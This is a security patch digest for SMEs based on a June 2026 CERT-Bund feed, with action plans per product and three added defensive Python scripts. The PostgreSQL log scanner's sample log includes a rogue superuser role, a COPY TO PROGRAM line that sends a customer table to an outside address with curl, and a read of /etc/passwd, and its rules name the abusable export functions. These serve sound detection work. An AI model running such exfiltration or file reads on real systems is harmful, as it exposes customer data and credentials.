The 2026-06-27 BSI CERT-Bund feed shows a dense patch-risk day for SMEs: 153 advisories, with the main business exposure concentrated in public-facing infrastructure, databases, identity systems, developer platforms, AI tooling, and production Linux stacks.

High-Severity SME Action Plan

Flowise

  1. Risk: Flowise contains critical vulnerabilities that may allow remote code execution or information disclosure.
  2. Business Impact: Production Halt, Unauthorized System Access.
  3. Action: 1. Identify all Flowise instances, including test and internal deployments. 2. If internet-facing, remove public access immediately or restrict it by VPN/IP allowlist. 3. Apply vendor fixes as soon as available. 4. Review admin accounts, API keys, workflow credentials, and recent logs for unknown access.
  4. Advisory Reference: WID-SEC-2025-0568, WID-SEC-2025-2048, WID-SEC-2025-0569
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0568

LiteLLM

  1. Risk: LiteLLM has critical and high vulnerabilities that may allow SQL injection, unauthorized access, or code execution with service privileges.
  2. Business Impact: Data Exposure, AI Service Compromise.
  3. Action: 1. Check whether LiteLLM is used in production, staging, or internal AI gateways. 2. Restrict access to trusted networks only. 3. Patch immediately. 4. Rotate API keys and database credentials if exposure cannot be ruled out. 5. Review logs for unusual model requests, admin changes, and database errors.
  4. Advisory Reference: WID-SEC-2026-1288, WID-SEC-2026-1319
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1288

PTC FlexPLM / PTC Windchill

  1. Risk: PTC FlexPLM and PTC Windchill contain a critical remote code execution vulnerability.
  2. Business Impact: Production Halt, Product Data Exposure.
  3. Action: 1. Ask IT whether PTC FlexPLM or Windchill is used for product lifecycle management. 2. If internet-facing, restrict access immediately. 3. Apply the vendor security update. 4. Review administrator accounts and recent file uploads or workflow changes.
  4. Advisory Reference: WID-SEC-2026-1991
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1991

Linux Kernel

  1. Risk: Multiple Linux Kernel advisories may allow denial of service, security bypass, information disclosure, code execution, or unspecified impacts.
  2. Business Impact: Production Halt.
  3. Action: 1. Inventory Linux servers, appliances, virtual machines, and container hosts. 2. Prioritize internet-facing systems and business-critical workloads. 3. Schedule kernel updates with reboot windows. 4. Confirm systems actually rebooted into the patched kernel. 5. Monitor service stability after reboot.
  4. Advisory Reference: WID-SEC-2026-2077, WID-SEC-2026-0861, WID-SEC-2026-1802, WID-SEC-2026-1700
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2077
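
Step 4 of the kernel plan is where patching most often fails quietly: the package lands on disk but the host keeps running the old kernel until it reboots. The following Python script is an added example for that check; it is not BSI or distribution tooling. It assumes (hypothetically) that installed kernels can be listed from the directory names under /lib/modules and compares them with the running release from os.uname(). The version ordering is a heuristic that treats every run of digits as a number, which is sufficient within one distribution's kernel naming but is not a full RPM or deb version comparison.

```python
"""Check whether a Linux host is actually running its newest installed kernel.

Added example, not part of the BSI advisory or of any distribution's tooling.
Assumptions (hypothetical): installed kernels are discovered from the directory
names under /lib/modules (one directory per installed release string); the
running release comes from os.uname().release.
"""
import os
import re


def version_key(release: str):
    """Turn a kernel release string into a tuple of integers for ordering.

    Heuristic: every run of digits becomes one integer, e.g.
    '5.14.0-503.16.4.el9_5.x86_64' -> (5, 14, 0, 503, 16, 4, 9, 5, 86, 64).
    This orders correctly within one distribution flavor (it is not fooled by
    '6.1.0-9' sorting after '6.1.0-30' the way plain string sorting is), but it
    is not a general RPM/deb version comparison.
    """
    return tuple(int(tok) for tok in re.findall(r"\d+", release))


def newest_kernel(installed):
    """Return the highest-versioned release string from the installed list."""
    return max(installed, key=version_key)


def reboot_needed(running: str, installed) -> bool:
    """True when some installed kernel is newer than the one currently running."""
    return version_key(newest_kernel(installed)) > version_key(running)


def report(running: str, installed) -> str:
    """One-line verdict suitable for a patch-window checklist or a monitoring check."""
    newest = newest_kernel(installed)
    if reboot_needed(running, installed):
        return f"REBOOT NEEDED: running {running}, newest installed {newest}"
    return f"OK: running newest installed kernel {running}"


if __name__ == "__main__":
    running = os.uname().release
    # /lib/modules/<release> exists for every installed kernel package (assumption
    # stated above); fall back to the running kernel alone if the directory is absent.
    installed = sorted(os.listdir("/lib/modules")) if os.path.isdir("/lib/modules") else [running]
    print(report(running, installed))
```

Run it after the reboot window on every host (or through configuration management) and alert on REBOOT NEEDED. Stale module directories left behind by removed kernels can produce false positives; querying the package manager (rpm -q kernel, dpkg -l 'linux-image-*') is the more exact source of installed releases. Kernel live patching (kpatch, Ubuntu Livepatch) does not change the release string, so a live-patched host still reports the old version and has to be tracked through that tooling instead.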

jq

  1. Risk: jq contains vulnerabilities that may allow denial of service or data manipulation, or have unspecified impact, in scripts and automation that depend on it.
  2. Business Impact: Production Halt, Automation Integrity Risk.
  3. Action: 1. Check whether jq is installed on servers, CI/CD runners, backup scripts, or data-processing jobs. 2. Patch through the operating system package manager. 3. Re-run critical automation jobs after patching. 4. Watch for failed scripts or changed JSON-processing output.
  4. Advisory Reference: WID-SEC-2026-1469
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1469

Google Chrome / Microsoft Edge / Mozilla Firefox / Thunderbird

  1. Risk: Browser and mail-client vulnerabilities may allow code execution, sandbox escape, denial of service, or security bypass through malicious web or email content.
  2. Business Impact: Endpoint Compromise, Credential Theft.
  3. Action: 1. Force browser and mail-client updates through device management. 2. Ask users to restart browsers, not only install updates. 3. Prioritize finance, HR, admin, and management devices. 4. Block outdated versions where endpoint management allows it.
  4. Advisory Reference: WID-SEC-2026-2071, WID-SEC-2026-2092, WID-SEC-2026-1959
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2071

Fluentd

  1. Risk: Fluentd vulnerabilities may allow remote code execution, information disclosure, or denial of service in logging pipelines.
  2. Business Impact: Production Halt, Monitoring Blindness.
  3. Action: 1. Identify Fluentd agents and collectors. 2. Restrict ingestion endpoints to trusted networks. 3. Patch Fluentd and related plugins. 4. Confirm logs still arrive after patching. 5. Review whether unknown sources submitted logs.
  4. Advisory Reference: WID-SEC-2026-2096
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2096

Keycloak

  1. Risk: Keycloak vulnerabilities may allow information disclosure, cross-site scripting, security bypass, file manipulation, or spoofing of displayed information.
  2. Business Impact: Customer Trust Risk, Identity Access Risk.
  3. Action: 1. Identify all Keycloak realms and public login portals. 2. Patch Keycloak. 3. Check login themes, static assets, and admin users for unauthorized changes. 4. Review logs for suspicious admin-console activity. 5. Rotate client secrets if compromise is suspected.
  4. Advisory Reference: WID-SEC-2026-2093
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2093

PowerDNS

  1. Risk: PowerDNS vulnerabilities may affect DNS availability, cache integrity, DNSSEC validation, and confidentiality.
  2. Business Impact: Website and Email Outage.
  3. Action: 1. Confirm whether PowerDNS runs authoritative or recursive DNS. 2. Patch immediately if it serves public or internal business-critical domains. 3. Verify DNSSEC validation and zone integrity. 4. Monitor DNS error rates and unusual cache behavior.
  4. Advisory Reference: WID-SEC-2026-2091
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2091

Coolify

  1. Risk: Coolify vulnerabilities may allow code execution, security bypass, or information disclosure in deployment platforms.
  2. Business Impact: Application Deployment Compromise.
  3. Action: 1. Check whether Coolify manages production apps. 2. Restrict admin access to trusted networks. 3. Patch Coolify. 4. Review deployment logs, environment variables, tokens, and connected Git repositories.
  4. Advisory Reference: WID-SEC-2026-2089
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2089

Google Cloud Platform

  1. Risk: A Google Cloud Platform vulnerability may allow remote code execution.
  2. Business Impact: Cloud Workload Compromise.
  3. Action: 1. Ask your cloud administrator whether affected GCP services are in use. 2. Apply Google-recommended mitigations and updates. 3. Review service accounts, IAM changes, and recent workload activity. 4. Rotate credentials if abnormal access appears.
  4. Advisory Reference: WID-SEC-2026-2087
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2087

WSO2 API Manager

  1. Risk: WSO2 API Manager vulnerabilities may allow security bypass, denial of service, privilege escalation, code execution, SQL injection, or cross-site scripting.
  2. Business Impact: Production Halt, Customer Trust Risk.
  3. Action: 1. Identify public API gateways and admin consoles. 2. Restrict external access where possible. 3. Patch WSO2 API Manager. 4. Review API keys, admin users, gateway logs, and database access logs. 5. Validate that critical APIs still work after patching.
  4. Advisory Reference: WID-SEC-2026-2085
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2085

IBM WebSphere Application Server / Liberty

  1. Risk: IBM WebSphere and Liberty vulnerabilities may allow file manipulation, cross-site scripting, code execution, information disclosure, or denial of service.
  2. Business Impact: Production Halt, Customer Trust Risk.
  3. Action: 1. Identify WebSphere and Liberty applications. 2. Patch according to IBM guidance. 3. Check public web files and deployed applications for unexpected changes. 4. Review access logs for exploitation attempts. 5. Test business-critical workflows after patching.
  4. Advisory Reference: WID-SEC-2026-2050
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2050
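
Both the Keycloak step "check login themes, static assets, and admin users for unauthorized changes" and the WebSphere step "check public web files and deployed applications for unexpected changes" need a known-good reference to compare against. The following Python script is an added example of such a baseline; it is not Keycloak, IBM, or digest code. It assumes (hypothetically) a directory tree you trust right after a clean deployment, such as a Keycloak themes/ directory or a WebSphere application's web root, and stores a JSON manifest of relative path to SHA-256. The demo() function builds a constructed theme tree, tampers with it, and returns the detected differences.

```python
"""Baseline-and-diff check for static web assets (Keycloak themes, WebSphere
public web files). Added example, not code from Keycloak, IBM or the digest.
Assumptions (hypothetical): the tree is trusted at baseline time; the baseline
is a JSON manifest mapping relative POSIX path -> SHA-256 of file contents.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: Path) -> str:
    """Stream the file so large assets do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Return added, removed and modified paths between two manifests."""
    base, cur = set(baseline), set(current)
    return {
        "added": sorted(cur - base),
        "removed": sorted(base - cur),
        "modified": sorted(p for p in base & cur if baseline[p] != current[p]),
    }


def save_manifest(manifest: dict, path: Path) -> None:
    path.write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(path: Path) -> dict:
    return json.loads(path.read_text())


def check(root: Path, baseline_path: Path) -> dict:
    """Compare the live tree against the stored baseline."""
    return diff_manifests(load_manifest(baseline_path), build_manifest(root))


def demo() -> dict:
    """Walk-through on a constructed login-theme tree (all data constructed here)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "themes" / "mytheme" / "login"
        (root / "resources" / "js").mkdir(parents=True)
        (root / "login.ftl").write_text("<html>clean template</html>")
        (root / "resources" / "js" / "app.js").write_text("console.log('ok');")
        manifest = Path(tmp) / "baseline.json"
        save_manifest(build_manifest(root), manifest)
        # Simulated tampering: script injected into the login page, a legitimate
        # file removed, and a new file dropped next to the theme's JavaScript.
        (root / "login.ftl").write_text("<html>clean template<script>injected</script></html>")
        (root / "resources" / "js" / "app.js").unlink()
        (root / "resources" / "js" / "skimmer.js").write_text("collect()")
        return check(root, manifest)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4 and sys.argv[1] in ("init", "check"):
        mode, root, manifest = sys.argv[1], Path(sys.argv[2]), Path(sys.argv[3])
        if mode == "init":
            save_manifest(build_manifest(root), manifest)
        else:
            print(json.dumps(check(root, manifest), indent=2))
    else:
        print(json.dumps(demo(), indent=2))
```

Take the baseline from the deployment artifact or immediately after a clean install, and keep the manifest off the host (in the repository or on a separate system): a manifest generated after a compromise only certifies the attacker's files. Rerun the check after every patch and treat any unexplained "added" or "modified" entry, especially in login templates and JavaScript, as an incident indicator rather than a cosmetic difference.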

MariaDB / Oracle MySQL / PostgreSQL

  1. Risk: Database advisories affect MariaDB, Oracle MySQL, and PostgreSQL, including SQL injection, privilege escalation, code execution, information disclosure, and denial of service.
  2. Business Impact: GDPR Liability, Production Halt.
  3. Action: 1. Inventory all database servers and managed database services. 2. Prioritize systems containing customer, employee, payment, or order data. 3. Patch during a controlled maintenance window. 4. Review database logs for unauthorized exports, new users, privilege changes, and unusual queries. 5. Involve the Data Protection Officer if unauthorized access cannot be excluded.
  4. Advisory Reference: WID-SEC-2026-1744, WID-SEC-2026-1199, WID-SEC-2025-0372, WID-SEC-2024-3475, WID-SEC-2024-1800, WID-SEC-2024-0335, WID-SEC-2023-2873, WID-SEC-2026-0409, WID-SEC-2026-1544, WID-SEC-2025-1842
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0372
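
Step 4 of the database plan asks for a review of "unauthorized exports, new users, privilege changes, and unusual queries". The following Python scanner is an added example of that review for PostgreSQL server logs; it is not PostgreSQL, BSI, or digest code. It assumes (hypothetically) log_statement set to at least 'ddl', so that role and GRANT statements are actually logged (exports through COPY TO or pg_read_file only appear with log_statement = 'all' or with the pgaudit extension), and a log_line_prefix of '%m [%p] %u@%d ', which is the shape of the constructed sample lines in SAMPLE_LOG. The rule set is a starting point; MariaDB and MySQL general logs need their own line parser and patterns such as INTO OUTFILE or LOAD_FILE().

```python
"""Flag risky statements in PostgreSQL server logs after a database advisory.

Added example, not from PostgreSQL, BSI or the digest. Assumptions
(hypothetical): log_statement >= 'ddl' and log_line_prefix '%m [%p] %u@%d ',
which is what the constructed SAMPLE_LOG below looks like.
"""
import re

# (category, regex applied to the SQL text). Case-insensitive.
RULES = [
    ("new_role", re.compile(r"\bCREATE\s+(ROLE|USER)\b", re.I)),
    ("privilege_change", re.compile(
        r"\b(CREATE|ALTER)\s+(ROLE|USER)\b.*\b(SUPERUSER|CREATEROLE|BYPASSRLS|REPLICATION)\b", re.I)),
    ("privilege_change", re.compile(
        r"\bGRANT\b.*\b(ALL|pg_execute_server_program|pg_read_server_files|pg_write_server_files)\b", re.I)),
    ("export", re.compile(r"\bCOPY\b.*\bTO\s+(PROGRAM|')", re.I)),
    ("export", re.compile(r"\b(pg_read_file|pg_read_binary_file|pg_ls_dir|lo_export|lo_import)\s*\(", re.I)),
]

# 'statement: <sql>' (simple query) or 'execute <name>: <sql>' (prepared statement)
# after the log_line_prefix; the prefix fields are captured so the report can say who ran it.
STATEMENT_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+"
    r"(?:statement|execute [^:]+):\s+(?P<sql>.*)$"
)


def parse_line(line: str):
    """Return the prefix fields and SQL text of a statement log line, else None."""
    m = STATEMENT_RE.match(line)
    return m.groupdict() if m else None


def classify(sql: str):
    """Return the sorted list of rule categories a single SQL statement trips."""
    return sorted({cat for cat, rx in RULES if rx.search(sql)})


def scan(lines):
    """One finding per flagged statement: (line number, user@db, categories, sql)."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line.rstrip("\n"))
        if not rec:
            continue  # connection messages, errors, continuation lines etc.
        cats = classify(rec["sql"])
        if cats:
            findings.append((n, f"{rec['user']}@{rec['db']}", cats, rec["sql"]))
    return findings


# Constructed sample: one normal query, then a persistence-and-exfiltration sequence.
# 203.0.113.10 is a documentation (TEST-NET-3) address, not a real host.
SAMPLE_LOG = """\
2026-06-27 09:12:01.114 UTC [4123] app@shop LOG:  execute <unnamed>: SELECT id, total FROM orders WHERE customer_id = $1
2026-06-27 09:12:44.930 UTC [4123] app@shop LOG:  statement: CREATE ROLE svc_backup LOGIN SUPERUSER PASSWORD 'x'
2026-06-27 09:13:02.002 UTC [4123] app@shop LOG:  statement: GRANT pg_read_server_files TO svc_backup
2026-06-27 09:13:30.518 UTC [4190] svc_backup@shop LOG:  statement: COPY (SELECT * FROM customers) TO PROGRAM 'curl -T - http://203.0.113.10/x'
2026-06-27 09:14:10.777 UTC [4190] svc_backup@shop LOG:  statement: SELECT pg_read_file('/etc/passwd')
2026-06-27 09:15:00.000 UTC [4201] report@shop LOG:  statement: COPY orders TO '/tmp/orders.csv'
"""


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for n, who, cats, sql in scan(lines):
        print(f"line {n}: {who} [{', '.join(cats)}] {sql}")
```

Run it over the retained log window since the advisory (python3 pg_log_review.py postgresql.log); every finding should map to a change ticket or a named operator, and anything that does not is the starting point for the Data Protection Officer conversation in step 5. The GRANT rule is deliberately broad (it also flags GRANT ALL) because over-granting inside the review window matters more than a few false positives.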

Node.js / Golang Go / Netty / libssh2 / vim

  1. Risk: Core developer and runtime components contain vulnerabilities that may allow code execution, denial of service, memory corruption, data manipulation, information disclosure, or security bypass.
  2. Business Impact: Software Supply Chain Risk, Production Halt.
  3. Action: 1. Ask development and IT teams to identify affected runtime versions in production, CI/CD, and containers. 2. Patch base images and build environments. 3. Rebuild and redeploy affected applications. 4. Confirm no outdated runtime remains in containers or long-lived servers.
  4. Advisory Reference: WID-SEC-2026-2004, WID-SEC-2026-1006, WID-SEC-2026-1996, WID-SEC-2026-1814, WID-SEC-2026-0940, WID-SEC-2026-1776, WID-SEC-2026-0548, WID-SEC-2026-0345, WID-SEC-2025-2227
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2004

Atlassian Products

  1. Risk: Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira, and Jira Service Management contain vulnerabilities affecting code execution, privilege escalation, security bypass, data manipulation, and information disclosure.
  2. Business Impact: Project Data Exposure, Internal Workflow Disruption.
  3. Action: 1. Identify all Atlassian products and public access paths. 2. Patch internet-facing Confluence, Jira, and Bitbucket first. 3. Review admin accounts, installed apps, access tokens, and recent permission changes. 4. Back up before patching and verify integrations afterward.
  4. Advisory Reference: WID-SEC-2026-1955
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1955

Red Hat Enterprise Linux / OpenShift / Service Mesh

  1. Risk: Red Hat advisories affect Enterprise Linux components, OpenShift Service Mesh, urllib3, OpenEXR, openCryptoki, HPLIP, and 389-ds-base, with possible denial of service, information disclosure, privilege escalation, and code execution.
  2. Business Impact: Production Halt, Platform Compromise.
  3. Action: 1. Check Red Hat systems, OpenShift clusters, and container base images. 2. Apply vendor errata through standard patch tooling. 3. Rebuild affected containers. 4. Restart dependent services. 5. Confirm cluster health and application readiness after updates.
  4. Advisory Reference: WID-SEC-2026-1957, WID-SEC-2026-1934, WID-SEC-2026-0207, WID-SEC-2026-1440
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1957

Docker / Aqua Security Trivy / vLLM

  1. Risk: Container and AI infrastructure tools contain vulnerabilities that may allow security bypass, file manipulation, denial of service, or code execution.
  2. Business Impact: Build Pipeline Compromise, AI Service Disruption.
  3. Action: 1. Inventory Docker hosts, Trivy scanners, and vLLM deployments. 2. Patch host packages and container images. 3. Rebuild CI/CD runners and AI-serving images. 4. Review build logs, scan outputs, mounted volumes, and service credentials.
  4. Advisory Reference: WID-SEC-2026-0873, WID-SEC-2026-1924, WID-SEC-2026-1974, WID-SEC-2026-0287, WID-SEC-2026-0190
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0873

cPanel / NGINX / Apache Tomcat / Rsync

  1. Risk: Hosting and web-serving components contain vulnerabilities that may allow denial of service, code execution, information disclosure, data manipulation, or security bypass.
  2. Business Impact: Website Outage, Customer Trust Risk.
  3. Action: 1. Identify hosting panels, reverse proxies, web servers, and file-sync services. 2. Patch cPanel/WHM, NGINX, Tomcat, and Rsync. 3. Restrict admin panels and sync services from public access. 4. Review web logs, upload directories, and configuration changes. 5. Verify websites and APIs after patching.
  4. Advisory Reference: WID-SEC-2026-1880, WID-SEC-2026-0860, WID-SEC-2026-0443, WID-SEC-2026-1661, WID-SEC-2026-1611, WID-SEC-2026-1527
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0860

IBM App Connect Enterprise Certified Container

  1. Risk: IBM App Connect Enterprise Certified Container contains vulnerabilities that may allow code execution, information disclosure, denial of service, or cross-site scripting.
  2. Business Impact: Integration Platform Disruption.
  3. Action: 1. Identify App Connect container deployments. 2. Pull patched container images. 3. Redeploy affected integration workloads. 4. Review exposed endpoints, credentials, and message-flow logs.
  4. Advisory Reference: WID-SEC-2026-1434
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1434

Other Operational Risks

The remaining 94 lower-severity advisories still matter operationally because they often become the backlog attackers rely on: medium findings in browsers, developer libraries, servers, and infrastructure tools combine with weak passwords, exposed admin panels, stale containers, or missing monitoring into a working attack path. Treat the medium and low items as a 30-day hygiene queue: assign owners, confirm product exposure, patch routinely, and document exceptions. This feed extract does not itemize the lower-severity advisories; use the BSI advisory pages as the working reference when matching products to your inventory.

Key Vulnerabilities Tracker

Table 1: Key Vulnerabilities Tracker

Severity | Affected Vendor/Product | Advisory Reference | Business Impact
Critical | Flowise | WID-SEC-2025-0568, WID-SEC-2025-2048, WID-SEC-2025-0569 | Production Halt, Unauthorized System Access
Critical | LiteLLM | WID-SEC-2026-1288, WID-SEC-2026-1319 | Data Exposure, AI Service Compromise
Critical | PTC FlexPLM / Windchill | WID-SEC-2026-1991 | Production Halt, Product Data Exposure
High | Linux Kernel | WID-SEC-2026-2077, WID-SEC-2026-0861, WID-SEC-2026-1802, WID-SEC-2026-1700 | Production Halt
High | jq | WID-SEC-2026-1469 | Production Halt, Automation Integrity Risk
High | Keycloak | WID-SEC-2026-2093 | Customer Trust Risk, Identity Access Risk
High | WSO2 API Manager | WID-SEC-2026-2085 | Production Halt, Customer Trust Risk
High | PostgreSQL | WID-SEC-2025-0372, WID-SEC-2026-1544 | GDPR Liability, Production Halt
High | MariaDB / Oracle MySQL | WID-SEC-2026-1744, WID-SEC-2026-1199 | Data Integrity and Availability Risk
High | Google Chrome / Microsoft Edge / Firefox / Thunderbird | WID-SEC-2026-2071, WID-SEC-2026-2092, WID-SEC-2026-1959 | Endpoint Compromise, Credential Theft
High | Fluentd | WID-SEC-2026-2096 | Production Halt, Monitoring Blindness
High | PowerDNS | WID-SEC-2026-2091 | Website and Email Outage
High | Coolify | WID-SEC-2026-2089 | Deployment Platform Compromise
High | Google Cloud Platform | WID-SEC-2026-2087 | Cloud Workload Compromise
High | IBM WebSphere / Liberty | WID-SEC-2026-2050 | Production Halt, Customer Trust Risk
High | Node.js / Go / Netty / libssh2 / vim | WID-SEC-2026-2004, WID-SEC-2026-1006, WID-SEC-2026-1996, WID-SEC-2026-1814, WID-SEC-2026-0940 | Software Supply Chain Risk, Production Halt
High | Atlassian Products | WID-SEC-2026-1955 | Project Data Exposure, Internal Workflow Disruption
High | Red Hat Enterprise Linux / OpenShift | WID-SEC-2026-1957, WID-SEC-2026-1934, WID-SEC-2026-0207 | Platform Compromise, Production Halt
High | Docker / Trivy / vLLM | WID-SEC-2026-0873, WID-SEC-2026-1924, WID-SEC-2026-0190 | Build Pipeline and AI Service Risk
High | cPanel / NGINX / Tomcat / Rsync | WID-SEC-2026-1880, WID-SEC-2026-0860, WID-SEC-2026-0443, WID-SEC-2026-1611 | Website Outage, Customer Trust Risk
High | IBM App Connect Enterprise Certified Container | WID-SEC-2026-1434 | Integration Platform Disruption

Patterns I noticed

The strongest pattern is not one single vendor. It is concentration around systems that keep SMEs running: identity, databases, web front ends, cloud services, developer runtimes, and container platforms.

AI tooling also appears repeatedly through Flowise, LiteLLM, and vLLM. If these tools were adopted quickly for internal automation, they should now be treated like production systems: patched, access-controlled, logged, and owned by a named operator.

  • G-HOST (Mittelstand Threat Digest Engine)